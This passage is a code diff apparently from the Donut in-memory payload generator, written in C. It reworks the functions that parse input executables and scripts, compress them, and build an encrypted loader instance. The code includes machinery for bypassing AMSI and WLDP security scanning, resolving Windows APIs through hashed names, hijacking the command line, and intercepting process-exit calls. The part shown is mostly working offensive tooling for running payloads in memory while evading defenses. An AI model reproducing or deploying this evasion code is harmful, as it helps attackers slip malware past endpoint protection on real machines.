344 typedef NTSTATUS (WINAPI *RtlGetCompressionWorkSpaceSize_t)(
345 USHORT CompressionFormatAndEngine,
346 PULONG CompressBufferWorkSpaceSize,
347 PULONG CompressFragmentWorkSpaceSize);
348
349 typedef NTSTATUS (WINAPI *RtlCompressBuffer_t)(
350 USHORT CompressionFormatAndEngine,
351 PUCHAR UncompressedBuffer,
352 ULONG UncompressedBufferSize,
353 PUCHAR CompressedBuffer,
354 ULONG CompressedBufferSize,
355 ULONG UncompressedChunkSize,
356 PULONG FinalCompressedSize,
357 PVOID WorkSpace);
358
359 ULONG wspace, fspace;
360 NTSTATUS nts;
361 PVOID ws;
362 HMODULE m;
363 RtlGetCompressionWorkSpaceSize_t RtlGetCompressionWorkSpaceSize;
364 RtlCompressBuffer_t RtlCompressBuffer;
365
366 // compress file using RtlCompressBuffer?
367 if(c->compress == DONUT_COMPRESS_LZNT1 ||
368 c->compress == DONUT_COMPRESS_XPRESS ||
369 c->compress == DONUT_COMPRESS_XPRESS_HUFF)
370 {
371 m = GetModuleHandle("ntdll");
372 RtlGetCompressionWorkSpaceSize = (RtlGetCompressionWorkSpaceSize_t)GetProcAddress(m, "RtlGetCompressionWorkSpaceSize");
373 RtlCompressBuffer = (RtlCompressBuffer_t)GetProcAddress(m, "RtlCompressBuffer");
374
375 if(RtlGetCompressionWorkSpaceSize == NULL || RtlCompressBuffer == NULL) {
376 DPRINT("Unable to resolve compression API");
377 return DONUT_ERROR_COMPRESSION;
378 }
379
380 DPRINT("Reading fragment and workspace size");
381 nts = RtlGetCompressionWorkSpaceSize(
382 (c->compress - 1) | COMPRESSION_ENGINE_MAXIMUM,
383 &wspace, &fspace);
384
385 if(nts == 0) {
386 DPRINT("workspace size : %"PRId32" | fragment size : %"PRId32, wspace, fspace);
387 ws = malloc(wspace);
388 if(ws != NULL) {
389 DPRINT("Allocating memory for compressed data.");
390 fi.zdata = malloc(fi.len);
391 if(fi.zdata != NULL) {
392 DPRINT("Compressing %p to %p with RtlCompressBuffer(%s)",
393 fi.data, fi.zdata,
394 c->compress == DONUT_COMPRESS_LZNT1 ? "LZNT" :
395 c->compress == DONUT_COMPRESS_XPRESS ? "XPRESS" : "XPRESS HUFFMAN");
396
397 nts = RtlCompressBuffer(
398 (c->compress - 1) | COMPRESSION_ENGINE_MAXIMUM,
399 fi.data, fi.len, fi.zdata, fi.len, 0,
400 (PULONG)&fi.zlen, ws);
401
402 if(nts != 0) {
403 DPRINT("NTSTATUS : %lx", nts);
404 err = DONUT_ERROR_COMPRESSION;
405 }
406 } else err = DONUT_ERROR_NO_MEMORY;
407 free(ws);
408 } else err = DONUT_ERROR_NO_MEMORY;
409 } else err = DONUT_ERROR_COMPRESSION;
410 }
411 #endif
412 if(c->compress == DONUT_COMPRESS_APLIB) {
413 DPRINT("Obtaining size of compressed data from aP_max_packed_size() and allocating memory");
414 fi.zdata = malloc(aP_max_packed_size(fi.len));
415 if(fi.zdata != NULL) {
416 DPRINT("Obtaining size of work memory from aP_workmem_size() and allocating memory");
417 uint8_t *workmem = malloc(aP_workmem_size(fi.len));
418 if(workmem != NULL) {
419 DPRINT("Compressing with aP_pack()");
420 fi.zlen = aP_pack(fi.data, fi.zdata, fi.len, workmem, NULL, NULL);
421
422 if(fi.zlen == APLIB_ERROR) err = DONUT_ERROR_COMPRESSION;
423 free(workmem);
424 } else err = DONUT_ERROR_NO_MEMORY;
425 } else err = DONUT_ERROR_NO_MEMORY;
426 }
427
428 // if compression is specified
429 if(err == DONUT_ERROR_SUCCESS && c->compress != DONUT_COMPRESS_NONE) {
430 // set the compressed length in configuration
431 c->zlen = fi.zlen;
432 DPRINT("Original file size : %"PRId32 " | Compressed : %"PRId32, fi.len, fi.zlen);
433 DPRINT("File size reduced by %"PRId32"%%", file_diff(fi.zlen, fi.len));
434 }
435 DPRINT("Leaving with error : %" PRId32, err);
436 return err;
437 }
438
439 /**
440 * Function: read_file_info
441 * ----------------------------
442 * Reads information about the input file.
443 *
444 * INPUT : Pointer to Donut configuration.
445 *
446 * OUTPUT : Donut error code.
447 */
448 static int read_file_info(PDONUT_CONFIG c) {
449 PIMAGE_NT_HEADERS nt;
450 PIMAGE_DATA_DIRECTORY dir;
451 PMDSTORAGESIGNATURE pss;
452 PIMAGE_COR20_HEADER cor;
453 DWORD dll, rva, cpu;
454 ULONG64 ofs;
455 PCHAR ext;
456 int err = DONUT_ERROR_SUCCESS;
457
276458 DPRINT("Entering.");
277459
278460 // invalid parameters passed?
279 if(path == NULL || fi == NULL) {
461 if(c->input[0] == 0) {
462 DPRINT("No input file provided.");
280463 return DONUT_ERROR_INVALID_PARAMETER;
281464 }
282 // zero initialize file_info structure
283 memset(fi, 0, sizeof(file_info));
284
285 DPRINT("Checking extension of %s", path);
286 ext = strrchr(path, '.');
465
466 DPRINT("Checking extension of %s", c->input);
467 ext = strrchr(c->input, '.');
287468
288469 // no extension? exit
289470 if(ext == NULL) {
471 DPRINT("Input file has no extension.");
290472 return DONUT_ERROR_FILE_INVALID;
291473 }
292474 DPRINT("Extension is \"%s\"", ext);
293475
294476 // VBScript?
295477 if (strcasecmp(ext, ".vbs") == 0) {
296 DPRINT("Module is VBS");
297 fi->type = DONUT_MODULE_VBS;
298 fi->arch = DONUT_ARCH_ANY;
478 DPRINT("File is VBS");
479 fi.type = DONUT_MODULE_VBS;
480 fi.arch = DONUT_ARCH_ANY;
299481 } else
300482 // JScript?
301483 if (strcasecmp(ext, ".js") == 0) {
302 DPRINT("Module is JS");
303 fi->type = DONUT_MODULE_JS;
304 fi->arch = DONUT_ARCH_ANY;
484 DPRINT("File is JS");
485 fi.type = DONUT_MODULE_JS;
486 fi.arch = DONUT_ARCH_ANY;
305487 } else
306 // XSL?
307 if (strcasecmp(ext, ".xsl") == 0) {
308 DPRINT("Module is XSL");
309 fi->type = DONUT_MODULE_XSL;
310 fi->arch = DONUT_ARCH_ANY;
311 } else
312488 // EXE?
313489 if (strcasecmp(ext, ".exe") == 0) {
314 DPRINT("Module is EXE");
315 fi->type = DONUT_MODULE_EXE;
490 DPRINT("File is EXE");
491 fi.type = DONUT_MODULE_EXE;
316492 } else
317493 // DLL?
318494 if (strcasecmp(ext, ".dll") == 0) {
319 DPRINT("Module is DLL");
320 fi->type = DONUT_MODULE_DLL;
495 DPRINT("File is DLL");
496 fi.type = DONUT_MODULE_DLL;
321497 } else {
322 // unrecognized extension
498 DPRINT("Don't recognize file extension.");
323499 return DONUT_ERROR_FILE_INVALID;
324500 }
325501
326 DPRINT("Mapping %s into memory", path);
327
328 err = map_file(path, fi);
502 DPRINT("Mapping %s into memory", c->input);
503
504 err = map_file(c->input);
329505 if(err != DONUT_ERROR_SUCCESS) return err;
330506
331507 // file is EXE or DLL?
332 if(fi->type == DONUT_MODULE_DLL ||
333 fi->type == DONUT_MODULE_EXE)
508 if(fi.type == DONUT_MODULE_DLL ||
509 fi.type == DONUT_MODULE_EXE)
334510 {
335 DPRINT("Checking DOS header");
336
337 if(!valid_dos_hdr(fi->map)) {
511 if(!valid_dos_hdr(fi.data)) {
512 DPRINT("EXE/DLL has no valid DOS header.");
338513 err = DONUT_ERROR_FILE_INVALID;
339514 goto cleanup;
340515 }
341 DPRINT("Checking NT header");
342
343 if(!valid_nt_hdr(fi->map)) {
516
517 if(!valid_nt_hdr(fi.data)) {
518 DPRINT("EXE/DLL has no valid NT header.");
344519 err = DONUT_ERROR_FILE_INVALID;
345520 goto cleanup;
346521 }
347 DPRINT("Checking IMAGE_DATA_DIRECTORY");
348
349 dir = Dirs(fi->map);
522
523 dir = Dirs(fi.data);
350524
351525 if(dir == NULL) {
526 DPRINT("EXE/DLL has no valid image directories.");
352527 err = DONUT_ERROR_FILE_INVALID;
353528 goto cleanup;
354529 }
355530 DPRINT("Checking characteristics");
356531
357 nt = NtHdr(fi->map);
532 nt = NtHdr(fi.data);
358533 dll = nt->FileHeader.Characteristics & IMAGE_FILE_DLL;
359 cpu = is32(fi->map);
534 cpu = is32(fi.data);
360535 rva = dir[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR].VirtualAddress;
361536
362537 // set the CPU architecture for file
363 fi->arch = cpu ? DONUT_ARCH_X86 : DONUT_ARCH_X64;
538 fi.arch = cpu ? DONUT_ARCH_X86 : DONUT_ARCH_X64;
364539
365540 // if COM directory present
366541 if(rva != 0) {
367542 DPRINT("COM Directory found");
368543
369544 // set type to EXE or DLL assembly
370 fi->type = (dll) ? DONUT_MODULE_NET_DLL : DONUT_MODULE_NET_EXE;
545 fi.type = (dll) ? DONUT_MODULE_NET_DLL : DONUT_MODULE_NET_EXE;
371546
372547 // try read the runtime version from meta header
373 strncpy(fi->ver, "v4.0.30319", DONUT_VER_LEN - 1);
548 strncpy(fi.ver, "v4.0.30319", DONUT_VER_LEN - 1);
374549
375 ofs = rva2ofs(fi->map, rva);
550 ofs = rva2ofs(fi.data, rva);
376551 if (ofs != -1) {
377 cor = (PIMAGE_COR20_HEADER)(ofs + fi->map);
552 cor = (PIMAGE_COR20_HEADER)(ofs + fi.data);
378553 rva = cor->MetaData.VirtualAddress;
379554 if(rva != 0) {
380 ofs = rva2ofs(fi->map, rva);
555 ofs = rva2ofs(fi.data, rva);
381556 if(ofs != -1) {
382 pss = (PMDSTORAGESIGNATURE)(ofs + fi->map);
557 pss = (PMDSTORAGESIGNATURE)(ofs + fi.data);
383558 DPRINT("Runtime version : %s", (char*)pss->pVersion);
384 strncpy(fi->ver, (char*)pss->pVersion, DONUT_VER_LEN - 1);
559 strncpy(fi.ver, (char*)pss->pVersion, DONUT_VER_LEN - 1);
385560 }
386561 }
387562 }
388 }
389 }
563 } else {
564 // we need relocation information for unmanaged EXE / DLL
565 rva = dir[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress;
566 if(rva == 0) {
567 DPRINT("EXE/DLL has no relocation information.");
568 err = DONUT_ERROR_NORELOC;
569 goto cleanup;
570 }
571 }
572 }
573 // assign length of file and type to configuration
574 c->len = fi.len;
575 c->mod_type = fi.type;
390576 cleanup:
391577 if(err != DONUT_ERROR_SUCCESS) {
392 unmap_file(fi);
393 }
394 DPRINT("Leaving.");
578 DPRINT("Unmapping input file due to errors.");
579 unmap_file();
580 }
581 DPRINT("Leaving with error : %" PRId32, err);
395582 return err;
396583 }
397584
398 // check if DLL exports function name
399 static int is_dll_export(file_info *fi, const char *function) {
400 PIMAGE_DATA_DIRECTORY dir;
401 PIMAGE_EXPORT_DIRECTORY exp;
402 DWORD rva, ofs, cnt;
403 PDWORD sym;
404 PCHAR str;
405 int found = 0;
406
407 DPRINT("Entering.");
408
409 dir = Dirs(fi->map);
410 if(dir != NULL) {
411 rva = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
412 DPRINT("EAT VA : %lx", rva);
413 if(rva != 0) {
414 ofs = rva2ofs(fi->map, rva);
415 if(ofs != -1) {
416 exp = (PIMAGE_EXPORT_DIRECTORY)(fi->map + ofs);
417 cnt = exp->NumberOfNames;
418 DPRINT("Number of exported functions : %lx", cnt);
419
420 if(cnt != 0) {
421 sym = (PDWORD)(rva2ofs(fi->map, exp->AddressOfNames) + fi->map);
422 // scan array for symbol
423 do {
424 str = (PCHAR)(rva2ofs(fi->map, sym[cnt - 1]) + fi->map);
425 DPRINT("Checking %s", str);
426 // if match found, exit
427 if(strcmp(str, function) == 0) {
428 DPRINT("Found API");
429 found = 1;
430 break;
431 }
432 } while (--cnt);
433 }
434 }
435 }
436 }
437 DPRINT("Leaving.");
438 return found;
439 }
440
441 // returns 1 on success else <=0
442 static int CreateRandom(void *buf, uint64_t len) {
443
585 /**
586 * Function: gen_random
587 * ----------------------------
588 * Generates pseudo-random bytes.
589 *
590 * INPUT : buf = where to store random bytes.
591 * : len = length of random bytes to generate.
592 *
593 * OUTPUT : 1 if ok, else 0
594 */
595 static int gen_random(void *buf, uint64_t len) {
444596 #if defined(WINDOWS)
445597 HCRYPTPROV prov;
446598 int ok;
448600 // 1. acquire crypto context
449601 if(!CryptAcquireContext(
450602 &prov, NULL, NULL,
451 PROV_RSA_AES,
603 PROV_RSA_FULL,
452604 CRYPT_VERIFYCONTEXT | CRYPT_SILENT)) return 0;
453605
454606 ok = (int)CryptGenRandom(prov, (DWORD)len, buf);
474626 #endif
475627 }
476628
477 // Generate a random string, not exceeding DONUT_MAX_NAME bytes
478 // tbl is from https://stackoverflow.com/a/27459196
479 static int GenRandomString(void *output, uint64_t len) {
629 /**
630 * Function: gen_random_string
631 * ----------------------------
632 * Generates a pseudo-random string
633 *
634 * INPUT : output = pointer to buffer that receives string
635 * : len = length of string to generate
636 *
637 * OUTPUT : 1 if ok, else 0
638 */
639 static int gen_random_string(void *output, uint64_t len) {
480640 uint8_t rnd[DONUT_MAX_NAME];
481641 int i;
482 char tbl[]="HMN34P67R9TWCXYF";
642 char tbl[]="HMN34P67R9TWCXYF"; // https://stackoverflow.com/a/27459196
483643 char *str = (char*)output;
484644
485645 if(len == 0 || len > (DONUT_MAX_NAME - 1)) return 0;
486646
487647 // generate DONUT_MAX_NAME random bytes
488 if(!CreateRandom(rnd, DONUT_MAX_NAME)) return 0;
648 if(!gen_random(rnd, DONUT_MAX_NAME)) return 0;
489649
490650 // generate a string using unambiguous characters
491651 for(i=0; i<len; i++) {
495655 return 1;
496656 }
497657
498 // cheapo conversion from utf8 to utf16
499 static uint64_t utf8_to_utf16(void* dst, const char* src) {
500 uint16_t *out = (uint16_t*)dst;
501 uint64_t i;
502
503 for(i=0; src[i] != 0; i++) {
504 out[i] = src[i];
505 }
506 return i;
507 }
508
509 static int CreateModule(PDONUT_CONFIG c, file_info *fi) {
510 PDONUT_MODULE mod = NULL;
511 uint64_t len = 0;
512 char *param, parambuf[DONUT_MAX_NAME*DONUT_MAX_PARAM+DONUT_MAX_PARAM];
513 int cnt, err=DONUT_ERROR_SUCCESS;
658 /**
659 * Function: build_module
660 * ----------------------------
661 * Create a Donut module from Donut configuration
662 *
663 * INPUT : A pointer to a donut configuration
664 *
665 * OUTPUT : Donut error code.
666 */
667 static int build_module(PDONUT_CONFIG c) {
668 PDONUT_MODULE mod = NULL;
669 uint32_t mod_len, data_len;
670 void *data;
671 int err = DONUT_ERROR_SUCCESS;
514672
515673 DPRINT("Entering.");
516674
675 // Compress the input file?
676 if(c->compress != DONUT_COMPRESS_NONE) {
677 err = compress_file(c);
678
679 if(err != DONUT_ERROR_SUCCESS) {
680 DPRINT("compress_file() failed");
681 return err;
682 }
683 DPRINT("Assigning %"PRIi32 " bytes of %p to data", fi.zlen, fi.zdata);
684 data = fi.zdata;
685 data_len = fi.zlen;
686 } else {
687 DPRINT("Assigning %"PRIi32 " bytes of %p to data", fi.len, fi.data);
688 data = fi.data;
689 data_len = fi.len;
690 }
517691 // Allocate memory for module information and contents of file
518 len = sizeof(DONUT_MODULE) + fi->size;
519 DPRINT("Allocating %" PRIi64 " bytes of memory for DONUT_MODULE", len);
520 mod = calloc(len, 1);
692 mod_len = data_len + sizeof(DONUT_MODULE);
693
694 DPRINT("Allocating %" PRIi32 " bytes of memory for DONUT_MODULE", mod_len);
695 mod = calloc(mod_len, 1);
521696
522697 // Memory not allocated? exit
523698 if(mod == NULL) {
699 DPRINT("calloc() failed");
524700 return DONUT_ERROR_NO_MEMORY;
525701 }
526702
527 // Set the type of module
528 mod->type = fi->type;
529
703 // Set the module info
704 mod->type = fi.type;
705 mod->thread = c->thread;
706 mod->compress = c->compress;
707 mod->unicode = c->unicode;
708 mod->zlen = fi.zlen;
709 mod->len = fi.len;
710
530711 // DotNet assembly?
531712 if(mod->type == DONUT_MODULE_NET_DLL ||
532713 mod->type == DONUT_MODULE_NET_EXE)
533714 {
534 // If no domain name specified, generate a random one
535 if(c->domain[0] == 0) {
536 if(!GenRandomString(c->domain, DONUT_DOMAIN_LEN)) {
537 err = DONUT_ERROR_RANDOM;
538 goto cleanup;
715 // If no domain name specified in configuration
716 if(c->domain[0] == 0) {
717 // If entropy is disabled
718 if(c->entropy == DONUT_ENTROPY_NONE) {
719 // Set to "AAAAAAAA"
720 memset(c->domain, 'A', DONUT_DOMAIN_LEN);
721 } else {
722 // Else, generate a random name
723 if(!gen_random_string(c->domain, DONUT_DOMAIN_LEN)) {
724 DPRINT("gen_random_string() failed");
725 err = DONUT_ERROR_RANDOM;
726 goto cleanup;
727 }
539728 }
540729 }
541 // convert to unicode format.
542 // wchar_t is 32-bits on linux, but 16-bit on windows. :-|
730 // Set the domain name to use in module
543731 DPRINT("Domain : %s", c->domain);
544 utf8_to_utf16(mod->domain, c->domain);
732 strncpy(mod->domain, c->domain, DONUT_DOMAIN_LEN);
545733
546734 // Assembly is DLL? Copy the class and method
547735 if(mod->type == DONUT_MODULE_NET_DLL) {
548736 DPRINT("Class : %s", c->cls);
549 utf8_to_utf16(mod->cls, c->cls);
737 strncpy(mod->cls, c->cls, DONUT_MAX_NAME-1);
550738
551739 DPRINT("Method : %s", c->method);
552 utf8_to_utf16(mod->method, c->method);
740 strncpy(mod->method, c->method, DONUT_MAX_NAME-1);
553741 }
554742 // If no runtime specified in configuration, use version from assembly
555743 if(c->runtime[0] == 0) {
556 strncpy(c->runtime, fi->ver, DONUT_MAX_NAME-1);
744 strncpy(c->runtime, fi.ver, DONUT_MAX_NAME-1);
557745 }
558746 DPRINT("Runtime : %s", c->runtime);
559 utf8_to_utf16(mod->runtime, c->runtime);
747 strncpy(mod->runtime, c->runtime, DONUT_MAX_NAME-1);
560748 } else
561 // Unmanaged DLL? check for exported api
562 if(mod->type == DONUT_MODULE_DLL &&
563 c->method[0] != 0)
564 {
749 // Unmanaged DLL? copy function name to module
750 if(mod->type == DONUT_MODULE_DLL && c->method[0] != 0) {
565751 DPRINT("DLL function : %s", c->method);
566 strncpy((char*)mod->method, c->method, DONUT_MAX_NAME-1);
752 strncpy(mod->method, c->method, DONUT_MAX_NAME-1);
567753 }
568754
569755 // Parameters specified?
570756 if(c->param[0] != 0) {
571 strncpy(parambuf, c->param, sizeof(parambuf)-1);
572 cnt = 0;
573 // Split by comma or semi-colon
574 param = strtok(parambuf, ",;");
575
576 while(param != NULL && cnt < DONUT_MAX_PARAM) {
577 if(strlen(param) >= DONUT_MAX_NAME) {
578 DPRINT("Parameter : \"%s\" exceeds DONUT_MAX_PARAM(%i)",
579 param, DONUT_MAX_NAME);
580 err = DONUT_ERROR_INVALID_PARAMETER;
581 goto cleanup;
757 // If file type is unmanaged EXE
758 if(mod->type == DONUT_MODULE_EXE) {
759 // If entropy is disabled
760 if(c->entropy == DONUT_ENTROPY_NONE) {
761 // Set to "AAAA"
762 memset(mod->param, 'A', 4);
763 } else {
764 // Generate 4-byte random name
765 if(!gen_random_string(mod->param, 4)) {
766 DPRINT("gen_random_string() failed");
767 err = DONUT_ERROR_RANDOM;
768 goto cleanup;
769 }
582770 }
583 DPRINT("Adding \"%s\"", param);
584 // convert ansi string to wide character string
585 utf8_to_utf16(mod->param[cnt++], param);
586
587 // get next parameter
588 param = strtok(NULL, ",;");
589 }
590 // set number of parameters
591 mod->param_cnt = cnt;
592 }
593
594 // set length of module data
595 mod->len = fi->size;
596 // read module into memory
597 memcpy(&mod->data, fi->map, fi->size);
771 // Add space
772 mod->param[4] = ' ';
773 }
774 //
775 // Copy parameters
776 strncat(mod->param, c->param, DONUT_MAX_NAME-6);
777 }
778 DPRINT("Copying data to module");
779
780 memcpy(&mod->data, data, data_len);
598781 // update configuration with pointer to module
599782 c->mod = mod;
600 c->mod_len = len;
601
783 c->mod_len = mod_len;
602784 cleanup:
603785 // if there was an error, free memory for module
604 if(err != DONUT_ERROR_SUCCESS && mod != NULL) {
786 if(err != DONUT_ERROR_SUCCESS) {
787 DPRINT("Releasing memory due to errors.");
605788 free(mod);
606 c->mod = NULL;
607 c->mod_len = 0;
608 }
609 DPRINT("Leaving.");
789 }
790 DPRINT("Leaving with error : %" PRId32, err);
610791 return err;
611792 }
612793
613 static int CreateInstance(PDONUT_CONFIG c, file_info *fi) {
794 /**
795 * Function: build_instance
796 * ----------------------------
797 * Creates the data necessary for main loader to execute VBS/JS/EXE/DLL files in memory.
798 *
799 * INPUT : Pointer to a Donut configuration.
800 *
801 * OUTPUT : Donut error code.
802 */
803 static int build_instance(PDONUT_CONFIG c) {
614804 DONUT_CRYPT inst_key, mod_key;
615 PDONUT_INSTANCE inst;
616 uint64_t inst_len;
805 PDONUT_INSTANCE inst = NULL;
806 int cnt, inst_len;
617807 uint64_t dll_hash;
618 int cnt;
808 int err = DONUT_ERROR_SUCCESS;
619809
620810 DPRINT("Entering.");
621811
622812 // Allocate memory for the size of instance based on the type
623 DPRINT("Allocating space for instance");
813 DPRINT("Allocating memory for instance");
624814 inst_len = sizeof(DONUT_INSTANCE);
625815
626 // if this is a PIC instance, add the size of module
816 // if the module is embedded, add the size of module
627817 // that will be appended to the end of structure
628 if(c->inst_type == DONUT_INSTANCE_PIC) {
629 DPRINT("The size of module is %" PRIi64 " bytes. "
818 if(c->inst_type == DONUT_INSTANCE_EMBED) {
819 DPRINT("The size of module is %" PRIi32 " bytes. "
630820 "Adding to size of instance.", c->mod_len);
631821 inst_len += c->mod_len;
632822 }
823 DPRINT("Total length of instance : %"PRIi32, inst_len);
824
633825 // allocate zero-initialized memory for instance
634826 inst = (PDONUT_INSTANCE)calloc(inst_len, 1);
635
827
636828 // Memory allocation failed? exit
637829 if(inst == NULL) {
830 DPRINT("Memory allocation failed");
638831 return DONUT_ERROR_NO_MEMORY;
639832 }
640833
641 #if !defined(NOCRYPTO)
642 DPRINT("Generating random key for instance");
643 if(!CreateRandom(&inst_key, sizeof(DONUT_CRYPT))) {
644 return DONUT_ERROR_RANDOM;
645 }
646 memcpy(&inst->key, &inst_key, sizeof(DONUT_CRYPT));
647
648 DPRINT("Generating random key for module");
649 if(!CreateRandom(&mod_key, sizeof(DONUT_CRYPT))) {
650 return DONUT_ERROR_RANDOM;
651 }
652 memcpy(&inst->mod_key, &mod_key, sizeof(DONUT_CRYPT));
653
654 DPRINT("Generating random string to verify decryption");
655 if(!GenRandomString(inst->sig, DONUT_SIG_LEN)) {
656 return DONUT_ERROR_RANDOM;
657 }
658 #endif
659
660 DPRINT("Generating random IV for Maru hash");
661 if(!CreateRandom(&inst->iv, MARU_IV_LEN)) {
662 return DONUT_ERROR_RANDOM;
663 }
664
665 DPRINT("Generating hashes for API using IV: %" PRIx64, inst->iv);
834 // set the length of instance and pointer to it in configuration
835 c->inst = inst;
836 c->inst_len = inst->len = inst_len;
837 // set the type of instance we're creating
838 inst->type = c->inst_type;
839 // indicate if we should call RtlExitUserProcess to terminate host process
840 inst->exit_opt = c->exit_opt;
841 // set the Original Entry Point
842 inst->oep = c->oep;
843 // set the entropy level
844 inst->entropy = c->entropy;
845 // set the bypass level
846 inst->bypass = c->bypass;
847 // set the module length
848 inst->mod_len = c->mod_len;
849
850 // encryption enabled?
851 if(c->entropy == DONUT_ENTROPY_DEFAULT) {
852 DPRINT("Generating random key for instance");
853 if(!gen_random(&inst_key, sizeof(DONUT_CRYPT))) {
854 DPRINT("gen_random() failed");
855 err = DONUT_ERROR_RANDOM;
856 goto cleanup;
857 }
858 // copy local key to configuration
859 memcpy(&inst->key, &inst_key, sizeof(DONUT_CRYPT));
860
861 DPRINT("Generating random key for module");
862 if(!gen_random(&mod_key, sizeof(DONUT_CRYPT))) {
863 DPRINT("gen_random() failed");
864 err = DONUT_ERROR_RANDOM;
865 goto cleanup;
866 }
867 // copy local key to configuration
868 memcpy(&inst->mod_key, &mod_key, sizeof(DONUT_CRYPT));
869
870 DPRINT("Generating random string to verify decryption");
871 if(!gen_random_string(inst->sig, DONUT_SIG_LEN)) {
872 DPRINT("gen_random() failed");
873 err = DONUT_ERROR_RANDOM;
874 goto cleanup;
875 }
876
877 DPRINT("Generating random IV for Maru hash");
878 if(!gen_random(&inst->iv, MARU_IV_LEN)) {
879 DPRINT("gen_random() failed");
880 err = DONUT_ERROR_RANDOM;
881 goto cleanup;
882 }
883 }
884
885 DPRINT("Generating hashes for API using IV: %" PRIX64, inst->iv);
666886
667887 for(cnt=0; api_imports[cnt].module != NULL; cnt++) {
668888 // calculate hash for DLL string
672892 // xor with DLL hash and store in instance
673893 inst->api.hash[cnt] = maru(api_imports[cnt].name, inst->iv) ^ dll_hash;
674894
675 DPRINT("Hash for %-15s : %-22s = %" PRIX64,
895 DPRINT("Hash for %-15s : %-22s = %016" PRIX64,
676896 api_imports[cnt].module,
677897 api_imports[cnt].name,
678898 inst->api.hash[cnt]);
679899 }
680 // save how many API to resolve
900
901 DPRINT("Setting number of API to %" PRIi32, cnt);
681902 inst->api_cnt = cnt;
682 inst->dll_cnt = 0;
683
684 strcpy(inst->dll_name[inst->dll_cnt++], "ole32.dll");
685 strcpy(inst->dll_name[inst->dll_cnt++], "oleaut32.dll");
686 strcpy(inst->dll_name[inst->dll_cnt++], "wininet.dll");
687 strcpy(inst->dll_name[inst->dll_cnt++], "mscoree.dll");
903
904 DPRINT("Setting DLL names to %s", DLL_NAMES);
905 strcpy(inst->dll_names, DLL_NAMES);
688906
689907 // if module is .NET assembly
690908 if(c->mod_type == DONUT_MODULE_NET_DLL ||
705923 {
706924 DPRINT("Copying GUID structures and DLL strings for loading VBS/JS");
707925
708 memcpy(&inst->xIID_IUnknown, &xIID_IUnknown, sizeof(GUID));
709 memcpy(&inst->xIID_IDispatch, &xIID_IDispatch, sizeof(GUID));
710 memcpy(&inst->xIID_IHost, &xIID_IHost, sizeof(GUID));
711 memcpy(&inst->xIID_IActiveScript, &xIID_IActiveScript, sizeof(GUID));
712 memcpy(&inst->xIID_IActiveScriptSite, &xIID_IActiveScriptSite, sizeof(GUID));
713 memcpy(&inst->xIID_IActiveScriptParse32, &xIID_IActiveScriptParse32, sizeof(GUID));
714 memcpy(&inst->xIID_IActiveScriptParse64, &xIID_IActiveScriptParse64, sizeof(GUID));
715
716 utf8_to_utf16(inst->wscript, "WScript");
717 utf8_to_utf16(inst->wscript_exe, "wscript.exe");
926 memcpy(&inst->xIID_IUnknown, &xIID_IUnknown, sizeof(GUID));
927 memcpy(&inst->xIID_IDispatch, &xIID_IDispatch, sizeof(GUID));
928 memcpy(&inst->xIID_IHost, &xIID_IHost, sizeof(GUID));
929 memcpy(&inst->xIID_IActiveScript, &xIID_IActiveScript, sizeof(GUID));
930 memcpy(&inst->xIID_IActiveScriptSite, &xIID_IActiveScriptSite, sizeof(GUID));
931 memcpy(&inst->xIID_IActiveScriptSiteWindow, &xIID_IActiveScriptSiteWindow, sizeof(GUID));
932 memcpy(&inst->xIID_IActiveScriptParse32, &xIID_IActiveScriptParse32, sizeof(GUID));
933 memcpy(&inst->xIID_IActiveScriptParse64, &xIID_IActiveScriptParse64, sizeof(GUID));
934
935 strcpy(inst->wscript, "WScript");
936 strcpy(inst->wscript_exe, "wscript.exe");
718937
719938 if(c->mod_type == DONUT_MODULE_VBS) {
720939 memcpy(&inst->xCLSID_ScriptLanguage, &xCLSID_VBScript, sizeof(GUID));
721940 } else {
722941 memcpy(&inst->xCLSID_ScriptLanguage, &xCLSID_JScript, sizeof(GUID));
723942 }
724 } else
725 // if module is XSL
726 if(c->mod_type == DONUT_MODULE_XSL)
727 {
728 DPRINT("Copying GUID structures for loading XSL to instance");
729
730 memcpy(&inst->xCLSID_DOMDocument30, &xCLSID_DOMDocument30, sizeof(GUID));
731 memcpy(&inst->xIID_IXMLDOMDocument, &xIID_IXMLDOMDocument, sizeof(GUID));
732 memcpy(&inst->xIID_IXMLDOMNode, &xIID_IXMLDOMNode, sizeof(GUID));
733 }
734
735 // required to disable AMSI
736 strcpy(inst->amsi.s, "AMSI");
737 strcpy(inst->amsiInit, "AmsiInitialize");
738 strcpy(inst->amsiScanBuf, "AmsiScanBuffer");
739 strcpy(inst->amsiScanStr, "AmsiScanString");
740
741 strcpy(inst->clr, "CLR");
742
743 // required to disable WLDP
744 strcpy(inst->wldp, "WLDP");
745 strcpy(inst->wldpQuery, "WldpQueryDynamicCodeTrust");
746 strcpy(inst->wldpIsApproved, "WldpIsClassInApprovedList");
747
748 // set the type of instance we're creating
749 inst->type = c->inst_type;
750
943 }
944
945 // if bypassing enabled, copy these strings over
946 if(c->bypass != DONUT_BYPASS_NONE) {
947 DPRINT("Copying strings required to bypass AMSI");
948
949 strcpy(inst->clr, "clr");
950 strcpy(inst->amsi, "amsi");
951 strcpy(inst->amsiInit, "AmsiInitialize");
952 strcpy(inst->amsiScanBuf, "AmsiScanBuffer");
953 strcpy(inst->amsiScanStr, "AmsiScanString");
954
955 DPRINT("Copying strings required to bypass WLDP");
956
957 strcpy(inst->wldp, "wldp");
958 strcpy(inst->wldpQuery, "WldpQueryDynamicCodeTrust");
959 strcpy(inst->wldpIsApproved, "WldpIsClassInApprovedList");
960 }
961
962 // if module is an unmanaged EXE
963 if(c->mod_type == DONUT_MODULE_EXE) {
964 // does the user specify parameters for the command line?
965 if(c->param[0] != 0) {
966 DPRINT("Copying strings required to replace command line.");
967
968 strcpy(inst->dataname, ".data");
969 strcpy(inst->kernelbase, "kernelbase");
970 strcpy(inst->cmd_syms, "_acmdln;__argv;__p__acmdln;__p___argv;_wcmdln;__wargv;__p__wcmdln;__p___wargv");
971 }
972 // does user want loader to run the entrypoint as a thread?
973 if(c->thread != 0) {
974 DPRINT("Copying strings required to intercept exit-related API");
975 // these exit-related API will be replaced with pointer to RtlExitUserThread
976 strcpy(inst->exit_api, "ExitProcess;exit;_exit;_cexit;_c_exit;quick_exit;_Exit");
977 }
978 }
979
751980 // if the module will be downloaded
752981 // set the URL parameter and request verb
753 if(inst->type == DONUT_INSTANCE_URL) {
754 // generate a random name for module
755 // that will be saved to disk
